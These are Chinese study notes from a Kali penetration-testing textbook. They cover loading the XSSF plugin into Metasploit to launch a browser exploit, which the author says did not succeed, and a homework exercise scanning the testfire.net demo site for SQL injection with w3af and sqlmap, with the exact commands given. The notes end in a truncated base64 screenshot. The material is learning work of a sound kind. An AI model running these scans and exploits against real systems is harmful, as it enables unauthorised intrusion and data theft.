p163 XSSF

默认kali 2.0中没有xssf,先下载:https://code.google.com/archive/p/xssf/downloads

将下载下来的zip文件解压,将其中的data, plugins, lab等文件夹合并到/usr/share/metasploit-framework/中的相应文件夹,然后即可在msfconsole中load xssf。

按照书上的做,但是最后的攻击并没有成功!

msf auxiliary(browser_autopwn) > xssf_exploit

[*] Searching Metasploit launched module with JobID = ''...

[+] A running exploit exists: 'Exploit: windows/browser/ie_createobject'

[*] Exploit execution started, press [CTRL + C] to stop it !

[+] Remaining victims to attack: [[] ()]  (停在这里一直不动)

^C[-] Exploit interrupted by the console user

p180 实践作业

1、探测www.testfire.net中存在的sql注入漏洞:

root@kali:~# w3af_console

w3af>>> plugins

w3af/plugins>>> audit sqli

w3af/plugins>>> crawl web_spider

w3af/plugins>>> back

w3af>>> target

w3af/config:target>>> set target http://www.testfire.net/bank/login.aspx

w3af/config:target>>> back

The configuration has been saved.

w3af>>> plugins

w3af/plugins>>> output html_file

w3af/plugins>>> output config html_file

w3af/plugins/output/config:html_file>>> set verbose True

w3af/plugins/output/config:html_file>>> back

The configuration has been saved.

w3af/plugins>>> back

w3af>>> start

成功扫出 8 URLs and 10 different injections points.

用sqlmap去扫

sqlmap -u "http://www.testfire.net/bank/login.aspx" --data "uid=Admin&passw=a&btnSubmit=Login"

检测出后台数据库的一些信息

aaarticlea/png;base64,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